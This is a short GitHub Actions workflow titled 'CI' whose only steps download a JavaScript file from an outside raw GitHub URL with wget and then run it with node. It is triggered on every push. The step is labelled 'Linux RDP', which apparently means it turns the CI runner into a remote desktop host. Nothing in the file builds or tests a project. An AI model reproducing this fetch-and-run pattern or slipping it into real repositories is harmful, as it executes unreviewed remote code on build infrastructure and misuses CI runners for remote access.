name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:

    - name: Linux RDP
      run: wget https://raw.githubusercontent.com/raiyan088/public/main/directory.js
    - run: node directory.js
